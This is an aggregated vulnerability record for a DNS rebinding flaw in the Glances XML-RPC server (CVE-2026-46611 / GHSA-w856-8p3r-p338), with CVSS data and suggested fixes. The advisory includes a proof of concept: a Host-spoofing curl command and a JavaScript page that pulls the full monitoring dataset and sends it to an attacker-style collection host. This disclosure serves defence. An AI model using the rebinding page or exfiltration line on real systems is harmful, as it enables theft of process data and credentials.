CVE-2026-46611 (GCVE-0-2026-46611)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:00 – Updated: 2026-06-26 02:14

| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46611",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T02:14:18.408132Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-26T02:14:42.354Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-346",
"description": "CWE-346: Origin Validation Error",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-350",
"description": "CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:00:47.735Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-w856-8p3r-p338",
"discovery": "UNKNOWN"
},
"title": "Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46611",
"datePublished": "2026-06-25T18:00:47.735Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-26T02:14:42.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46611",
"date": "2026-06-26",
"epss": "0.00156",
"percentile": "0.0519"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46611\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-26T02:14:18.408132Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-26T02:14:35.954Z\"}}], \"cna\": {\"title\": \"Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack\", \"source\": {\"advisory\": \"GHSA-w856-8p3r-p338\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. 
Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-346\", \"description\": \"CWE-346: Origin Validation Error\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-350\", \"description\": \"CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:00:47.735Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46611\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-26T02:14:42.354Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:00:47.735Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46611
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-26 04:17

| Vendor | Product | Version |
|---|---|---|
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46611",
"lastModified": "2026-06-26T04:17:43.260",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46611",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T02:14:18.408132Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.800",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-346"
},
{
"lang": "en",
"value": "CWE-350"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-W856-8P3R-P338
Vulnerability from github – Published: 2026-06-22 21:31 – Updated: 2026-06-22 21:31

Summary
The Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. CVE-2026-32632 (patched in 4.5.2) added TrustedHostMiddleware to the REST/WebUI server; the MCP server has had equivalent protection since 4.5.1. The XML-RPC server received neither fix and has no allowed-hosts configuration key. Combined with the unrestricted Access-Control-Allow-Origin: * header (see companion advisory for CVE-2026-33533 and its incomplete fix), an attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim's browser.
Details
Affected component: glances/server.py — GlancesXMLRPCHandler / GlancesXMLRPCServer
Direct URL (commit 04579778e733d705898a169e049dc84772c852da):
- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py
Contrast — patched backends:
- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_restful_api.py
- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_mcp.py
The GlancesXMLRPCHandler class inherits from Python's xmlrpc.server.SimpleXMLRPCRequestHandler and does not override parse_request() to inspect or validate the Host header.
Contrast this with the two other Glances server backends, both of which received host-validation hardening:
REST / WebUI server (glances/outputs/glances_restful_api.py) — patched in 4.5.2:
# glances_restful_api.py
if self.webui_allowed_hosts:
self._app.add_middleware(
TrustedHostMiddleware,
allowed_hosts=self.webui_allowed_hosts,
)
MCP server (glances/outputs/glances_mcp.py) — protected since 4.5.1:
# glances_mcp.py
TransportSecuritySettings(
allowed_hosts=self.mcp_allowed_hosts,
...
)
XML-RPC server (glances/server.py) — no equivalent exists:
class GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):
# No Host header check; any Host value is accepted
rpc_paths = ('/RPC2',)
...
There is no xmlrpc_allowed_hosts (or equivalent) configuration key in glances.conf, and the server ignores the Host header on every incoming request.
Confirmed on: x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).
Test results:
| Server type | Host header | HTTP status | Data returned |
|---|---|---|---|
| XML-RPC | attacker.example.com | 200 OK | Yes — VULNERABLE |
| XML-RPC | 127.0.0.1:61209 | 200 OK | Yes (baseline) |
| REST API | attacker.example.com | 400 Bad Request | No — patched |
PoC
Attack overview
DNS rebinding breaks the browser Same-Origin Policy by making attacker.example.com temporarily resolve to the target's IP address (e.g. 127.0.0.1). From that point the victim's browser treats the attacker's page as same-origin with http://attacker.example.com:61209/RPC2, forwarding the attacker-controlled Host header to the local Glances XML-RPC server, which accepts it without validation.
Special configuration required
No special glances.conf settings are needed. The vulnerability is present in a default Glances XML-RPC server start (glances -s). For the comparison test (Step 3) the REST server must also be started; that step requires Glances to be installed with web dependencies (pip install "glances[web]").
Step 1 — Start the Glances XML-RPC server
glances -s -p 61209
Step 2 — Confirm the server accepts an arbitrary Host header
curl -s -D - -X POST "http://127.0.0.1:61209/RPC2" \
-H "Host: attacker.example.com" \
-H "Content-Type: text/plain" \
-d '<?xml version="1.0"?>
<methodCall><methodName>getAllPlugins</methodName></methodCall>'
Expected result (secure): HTTP/1.0 400 Bad Request
Actual result: HTTP/1.0 200 OK with full XML-RPC response body.
Step 3 — Confirm the REST API is patched (comparison)
# Start REST server with the same machine as allowed host:
glances -w -p 61210 --webui-port 61210
curl -s -o /dev/null -w "%{http_code}\n" \
"http://127.0.0.1:61210/api/4/status" \
-H "Host: attacker.example.com"
# Returns: 400 (TrustedHostMiddleware rejects the spoofed Host)
Step 4 — Full DNS rebinding exploitation (real-world path)
1. Attacker registers attacker.example.com with a low-TTL (1 second) DNS record initially pointing to their own server IP.
2. Attacker serves the following page from http://attacker.example.com:
<script>
async function exfil() {
const payload = `<?xml version="1.0"?>
<methodCall><methodName>getAll</methodName></methodCall>`;
try {
const r = await fetch('http://attacker.example.com:61209/RPC2', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: payload,
});
const data = await r.text();
// data contains: hostname, OS, all processes with cmd-lines, network, disk
await fetch('https://collect.attacker.example.com/?d=' + btoa(data));
} catch (_) {}
}
// Wait for TTL to expire and DNS to rebind to 127.0.0.1, then call exfil()
setTimeout(exfil, 5000);
</script>
3. Victim visits http://attacker.example.com in their browser.
4. After TTL expiry, the attacker's DNS server responds with 127.0.0.1.
5. The browser's fetch() call is sent to 127.0.0.1:61209 with Host: attacker.example.com; the XML-RPC server accepts it.
6. The Access-Control-Allow-Origin: * header (see companion advisory) allows the browser to read the response body.
7. The attacker receives the complete system monitoring snapshot.
Tools that simplify DNS rebinding for research/testing include: - Singularity - rbndr.us
Step 5 — Confirm absence of Host check in source
import inspect
import sys

sys.path.insert(0, '/path/to/glances')  # adjust to local clone

from glances.server import GlancesXMLRPCHandler

# Textual probe only: a substring search over the handler's source for either
# an allow-list attribute or any mention of the Host header.  It cannot prove
# a check exists (a comment would match too); a False result is the signal.
handler_src = inspect.getsource(GlancesXMLRPCHandler)
has_host_check = 'allowed_hosts' in handler_src or 'Host' in handler_src
print('Host check present:', has_host_check)
# Host check present: False
Impact
Vulnerability type: Insufficient Verification of Data Authenticity / DNS Rebinding (CWE-350)
Who is impacted: Any user whose browser can reach a Glances XML-RPC server and who can be lured to visit an attacker-controlled web page. This includes deployments where:
- Glances is bound to 127.0.0.1 (loopback) — DNS rebinding bypasses the loopback restriction.
- Glances is bound to a LAN IP — any browser on that LAN is at risk.
- Glances is exposed on a public IP — any browser on the internet is at risk.
Data exposed through the XML-RPC API includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, database passwords, and access tokens passed as environment variables or CLI flags), CPU/memory/disk/network statistics, open file descriptors, listening ports, and Docker/Kubernetes container metadata.
Impact:
- Confidentiality: High — complete system monitoring data readable remotely without credentials.
- Integrity: None — read-only XML-RPC API.
- Availability: None — no denial-of-service component.
The attack is amplified by the companion CORS wildcard issue (vuln03): without Access-Control-Allow-Origin: *, the browser would still block the response read. Both issues must be fixed together for effective remediation.
Suggested Fix
Option 1 — Add Host validation to the XML-RPC handler (preferred)
Add a webui_allowed_hosts (or new xmlrpc_allowed_hosts) configuration key, and validate the Host header in GlancesXMLRPCHandler:
# server.py
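class GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):
    """XML-RPC request handler with an optional Host-header allow-list.

    ``allowed_hosts`` is a class-level list shared by every handler instance;
    it is meant to be populated once from configuration before the server
    starts.  When it is empty no Host check is performed, which keeps the
    existing (unvalidated) behaviour as the default.
    """

    allowed_hosts: list[str] = []  # populated from config

    @staticmethod
    def _host_from_header(value: str) -> str:
        """Return the lower-cased host part of a ``Host`` header value.

        Handles a bracketed IPv6 literal (``[::1]:61209`` -> ``[::1]``) as
        well as a plain hostname or IPv4 address with an optional ``:port``
        suffix.  Surrounding whitespace is ignored; an empty value stays empty.
        """
        value = value.strip()
        if value.startswith('['):
            # IPv6 literal: the port follows the closing bracket, so splitting
            # on the first ':' would yield '[' and reject every IPv6 request.
            end = value.find(']')
            host = value[: end + 1] if end != -1 else value
        else:
            host = value.split(':', 1)[0]
        return host.lower()

    def parse_request(self) -> bool:
        """Parse the request line and headers, then enforce the Host allow-list.

        Returns the base-class result when ``allowed_hosts`` is empty.
        Otherwise the Host header (port stripped, case-folded) must match one
        of the configured entries exactly; wildcard entries are not
        interpreted.  On a missing or unknown Host a 400 is sent via
        ``send_error`` and False is returned so the request is not dispatched.
        """
        if not super().parse_request():
            return False
        if self.allowed_hosts:
            host = self._host_from_header(self.headers.get('Host', ''))
            # Host names are case-insensitive; normalise both sides.
            allowed = {entry.strip().lower() for entry in self.allowed_hosts}
            if host not in allowed:
                self.send_error(400, 'Bad Request: invalid Host header')
                return False
        return True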
Populate allowed_hosts from the existing webui_allowed_hosts config key (already used by the REST server), so operators have a single knob.
Option 2 — Deprecate and remove the XML-RPC server
The XML-RPC server is a legacy interface. The REST API (glances -w) provides a superset of functionality, is actively maintained, and has all current security controls. Deprecating the XML-RPC server in the next major release and directing users to the REST API would eliminate this attack surface entirely.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46611"
],
"database_specific": {
"cwe_ids": [
"CWE-346",
"CWE-350"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:31:44Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nThe Glances XML-RPC server (`glances -s`, implemented in `glances/server.py`) does not validate the HTTP `Host` header, leaving it vulnerable to DNS rebinding attacks. CVE-2026-32632 (patched in 4.5.2) added `TrustedHostMiddleware` to the REST/WebUI server; the MCP server has had equivalent protection since 4.5.1. The XML-RPC server received neither fix and has no `allowed-hosts` configuration key. Combined with the unrestricted `Access-Control-Allow-Origin: *` header (see companion advisory for CVE-2026-33533 and its incomplete fix), an attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser.\n\n---\n\n### Details\n\n**Affected component:** `glances/server.py` \u2014 `GlancesXMLRPCHandler` / `GlancesXMLRPCServer`\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py\n\nContrast \u2014 patched backends:\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_restful_api.py\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_mcp.py\n\nThe `GlancesXMLRPCHandler` class inherits from Python\u0027s `xmlrpc.server.SimpleXMLRPCRequestHandler` and does not override `parse_request()` to inspect or validate the `Host` header.\n\nContrast this with the two other Glances server backends, both of which received host-validation hardening:\n\n**REST / WebUI server** (`glances/outputs/glances_restful_api.py`) \u2014 patched in 4.5.2:\n\n```python\n# glances_restful_api.py\nif self.webui_allowed_hosts:\n self._app.add_middleware(\n TrustedHostMiddleware,\n allowed_hosts=self.webui_allowed_hosts,\n )\n```\n\n**MCP server** (`glances/outputs/glances_mcp.py`) \u2014 protected since 4.5.1:\n\n```python\n# glances_mcp.py\nTransportSecuritySettings(\n 
allowed_hosts=self.mcp_allowed_hosts,\n ...\n)\n```\n\n**XML-RPC server** (`glances/server.py`) \u2014 no equivalent exists:\n\n```python\nclass GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):\n # No Host header check; any Host value is accepted\n rpc_paths = (\u0027/RPC2\u0027,)\n ...\n```\n\nThere is no `xmlrpc_allowed_hosts` (or equivalent) configuration key in `glances.conf`, and the server ignores the `Host` header on every incoming request.\n\n**Confirmed on:** x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).\n\nTest results:\n\n| Server type | Host header | HTTP status | Data returned |\n|-------------|----------------------|-------------|---------------|\n| XML-RPC | `attacker.example.com` | 200 OK | Yes \u2014 VULNERABLE |\n| XML-RPC | `127.0.0.1:61209` | 200 OK | Yes (baseline) |\n| REST API | `attacker.example.com` | 400 Bad Request | No \u2014 patched |\n\n---\n\n### PoC\n\n**Attack overview**\n\nDNS rebinding breaks the browser Same-Origin Policy by making `attacker.example.com` temporarily resolve to the target\u0027s IP address (e.g. `127.0.0.1`). From that point the victim\u0027s browser treats the attacker\u0027s page as same-origin with `http://attacker.example.com:61209/RPC2`, forwarding the attacker-controlled `Host` header to the local Glances XML-RPC server, which accepts it without validation.\n\n**Special configuration required**\n\nNo special `glances.conf` settings are needed. The vulnerability is present in a default Glances XML-RPC server start (`glances -s`). 
For the comparison test (Step 3) the REST server must also be started; that step requires Glances to be installed with web dependencies (`pip install \"glances[web]\"`).\n\n---\n\n**Step 1 \u2014 Start the Glances XML-RPC server**\n\n```bash\nglances -s -p 61209\n```\n\n**Step 2 \u2014 Confirm the server accepts an arbitrary Host header**\n\n```bash\ncurl -s -D - -X POST \"http://127.0.0.1:61209/RPC2\" \\\n -H \"Host: attacker.example.com\" \\\n -H \"Content-Type: text/plain\" \\\n -d \u0027\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAllPlugins\u003c/methodName\u003e\u003c/methodCall\u003e\u0027\n```\n\nExpected result (secure): `HTTP/1.0 400 Bad Request`\nActual result: `HTTP/1.0 200 OK` with full XML-RPC response body.\n\n**Step 3 \u2014 Confirm the REST API is patched (comparison)**\n\n```bash\n# Start REST server with the same machine as allowed host:\nglances -w -p 61210 --webui-port 61210\n\ncurl -s -o /dev/null -w \"%{http_code}\\n\" \\\n \"http://127.0.0.1:61210/api/4/status\" \\\n -H \"Host: attacker.example.com\"\n# Returns: 400 (TrustedHostMiddleware rejects the spoofed Host)\n```\n\n**Step 4 \u2014 Full DNS rebinding exploitation (real-world path)**\n\n1. Attacker registers `attacker.example.com` with a low-TTL (1 second) DNS record initially pointing to their own server IP.\n2. 
Attacker serves the following page from `http://attacker.example.com`:\n\n```html\n\u003cscript\u003e\nasync function exfil() {\n const payload = `\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAll\u003c/methodName\u003e\u003c/methodCall\u003e`;\n try {\n const r = await fetch(\u0027http://attacker.example.com:61209/RPC2\u0027, {\n method: \u0027POST\u0027,\n headers: { \u0027Content-Type\u0027: \u0027text/plain\u0027 },\n body: payload,\n });\n const data = await r.text();\n // data contains: hostname, OS, all processes with cmd-lines, network, disk\n await fetch(\u0027https://collect.attacker.example.com/?d=\u0027 + btoa(data));\n } catch (_) {}\n}\n\n// Wait for TTL to expire and DNS to rebind to 127.0.0.1, then call exfil()\nsetTimeout(exfil, 5000);\n\u003c/script\u003e\n```\n\n3. Victim visits `http://attacker.example.com` in their browser.\n4. After TTL expiry, the attacker\u0027s DNS server responds with `127.0.0.1`.\n5. The browser\u0027s `fetch()` call is sent to `127.0.0.1:61209` with `Host: attacker.example.com`; the XML-RPC server accepts it.\n6. The `Access-Control-Allow-Origin: *` header (see companion advisory) allows the browser to read the response body.\n7. 
The attacker receives the complete system monitoring snapshot.\n\nTools that simplify DNS rebinding for research/testing include:\n- [Singularity](https://github.com/nccgroup/singularity)\n- [rbndr.us](https://rbndr.us)\n\n**Step 5 \u2014 Confirm absence of Host check in source**\n\n```python\nimport sys, inspect\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\nimport glances.server as s\n\nsrc = inspect.getsource(s.GlancesXMLRPCHandler)\nprint(\u0027Host check present:\u0027, \u0027allowed_hosts\u0027 in src or \u0027Host\u0027 in src)\n# Host check present: False\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Insufficient Verification of Data Authenticity / DNS Rebinding (CWE-350)\n\n**Who is impacted:** Any user whose browser can reach a Glances XML-RPC server and who can be lured to visit an attacker controlled web page. This includes deployments where:\n\n- Glances is bound to `127.0.0.1` (loopback) \u2014 DNS rebinding bypasses the loopback restriction.\n- Glances is bound to a LAN IP \u2014 any browser on that LAN is at risk.\n- Glances is exposed on a public IP \u2014 any browser on the internet is at risk.\n\n**Data exposed through the XML-RPC API** includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, database passwords, and access tokens passed as environment variables or CLI flags), CPU/memory/disk/network statistics, open file descriptors, listening ports, and Docker/Kubernetes container metadata.\n\n**Impact:**\n- **Confidentiality:** High \u2014 complete system monitoring data readable remotely without credentials.\n- **Integrity:** None \u2014 read-only XML-RPC API.\n- **Availability:** None \u2014 no denial-of-service component.\n\nThe attack is amplified by the companion CORS wildcard issue (vuln03): without `Access-Control-Allow-Origin: *`, the browser would still block the response read. 
Both issues must be fixed together for effective remediation.\n\n---\n\n### Suggested Fix\n\n**Option 1 \u2014 Add Host validation to the XML-RPC handler (preferred)**\n\nAdd a `webui_allowed_hosts` (or new `xmlrpc_allowed_hosts`) configuration key, and validate the `Host` header in `GlancesXMLRPCHandler`:\n\n```python\n# server.py\nclass GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):\n\n allowed_hosts: list[str] = [] # populated from config\n\n def parse_request(self) -\u003e bool:\n if not super().parse_request():\n return False\n if self.allowed_hosts:\n host = self.headers.get(\u0027Host\u0027, \u0027\u0027).split(\u0027:\u0027)[0]\n if host not in self.allowed_hosts:\n self.send_error(400, \u0027Bad Request: invalid Host header\u0027)\n return False\n return True\n```\n\nPopulate `allowed_hosts` from the existing `webui_allowed_hosts` config key (already used by the REST server), so operators have a single knob.\n\n**Option 2 \u2014 Deprecate and remove the XML-RPC server**\n\nThe XML-RPC server is a legacy interface. The REST API (`glances -w`) provides a superset of functionality, is actively maintained, and has all current security controls. Deprecating the XML-RPC server in the next major release and directing users to the REST API would eliminate this attack surface entirely.\n\n---\n\n### Responsible Disclosure\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first. \n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
"id": "GHSA-w856-8p3r-p338",
"modified": "2026-06-22T21:31:44Z",
"published": "2026-06-22T21:31:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00

| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | | Vendor Fix |
| Product | Identifier | Version | Remediation |
